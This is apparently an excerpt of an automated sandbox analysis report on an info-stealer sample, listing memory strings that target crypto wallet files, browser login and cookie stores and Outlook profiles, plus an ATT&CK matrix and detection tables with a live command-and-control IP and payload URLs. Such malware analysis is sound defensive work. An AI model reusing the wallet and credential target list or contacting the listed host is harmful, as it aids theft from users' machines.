                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                        Source: Yara match File source: 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara match File source: dump.pcap, type: PCAP
                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C490C40 sqlite3_bind_zeroblob,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C490D60 sqlite3_bind_parameter_name,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C3B8EA0 sqlite3_clear_bindings,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C490B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,
                        MITRE ATT&CK Matrix

                        The matrix is listed here one tactic per line, with the techniques of that column in the report's order; the leading numbers are the report's own counts and are reproduced as given.

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                        Execution: 11 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                        Privilege Escalation: 1 DLL Side-Loading; 511 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                        Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 131 Virtualization/Sandbox Evasion; 511 Process Injection
                        Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                        Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 144 System Information Discovery; 121 Security Software Discovery; 131 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 System Owner/User Discovery
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                        Collection: 1 Archive Collected Data; 4 Data from Local System; 1 Screen Capture; 1 Email Collection; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                        Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

Source | Detection | Scanner | Label | Link
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | 38% | ReversingLabs | Win32.Trojan.Amadey |
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | 35% | Virustotal | | Browse
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\d3d9.dll | 100% | Joe Sandbox ML | |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\d3d9.dll | 79% | ReversingLabs | Win32.Trojan.LummaStealer |
                        No Antivirus matches
                        No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
http://23.88.106.134/6a9f8e2503d99c04.phpGS | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phpwser | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV | 100% | Avira URL Cloud | malware |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
http://23.88.106 | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/chrome_newtab | 0% | Virustotal | | Browse
http://23.88.106.134/6a9f8e2503d99c04.php | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phpC | 100% | Avira URL Cloud | malware |
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/ac/?q= | 0% | Virustotal | | Browse
http://23.88.106.134/6a9f8e2503d99c04.php?S | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.php | 13% | Virustotal | | Browse
http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9 | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phpm | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phpiSS | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phppenSSH | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV | 100% | Avira URL Cloud | malware |
http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll | 100% | Avira URL Cloud | malware |
http://23.88.106.134/6a9f8e2503d99c04.phpz | 100% | Avira URL Cloud | malware |
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe | 0% | Avira URL Cloud | safe |
http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll | 12% | Virustotal | | Browse
http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b | 100% | Avira URL Cloud | malware |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe | 0% | Avira URL Cloud | safe |
http://23.88.106.134/6a9f8e2503d99c04.phpition: | 100% | Avira URL Cloud | malware |
http://www.sqlite.org/copyright.html. | 0% | Avira URL Cloud | safe |
http://23.88.106.134y | 0% | Avira URL Cloud | safe |
http://www.mozilla.com/en-US/blocklist/ | 0% | Avira URL Cloud | safe |
https://mozilla.org0/ | 0% | Avira URL Cloud | safe |
http://www.sqlite.org/copyright.html. | 0% | Virustotal | | Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
http://www.mozilla.com/en-US/blocklist/ | 0% | Virustotal | | Browse
http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll | 13% | Virustotal | | Browse
http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet | 100% | Avira URL Cloud | malware |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
http://23.88.106.134/566d6e1ec8db6394/softokn3.dll | 100% | Avira URL Cloud | malware |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | | Browse
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | Avira URL Cloud | safe |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | Virustotal | | Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal | | Browse
https://www.ecosia.org/newtab/ | 0% | Virustotal | | Browse
https://www.ecosia.org/newtab/ | 0% | Avira URL Cloud | safe |
http://23.88.106.134/566d6e1ec8db6394/mozglue.dll | 12% | Virustotal | | Browse
http://23.88.106.134/566d6e1ec8db6394/mozglue.dll | 100% | Avira URL Cloud | malware |
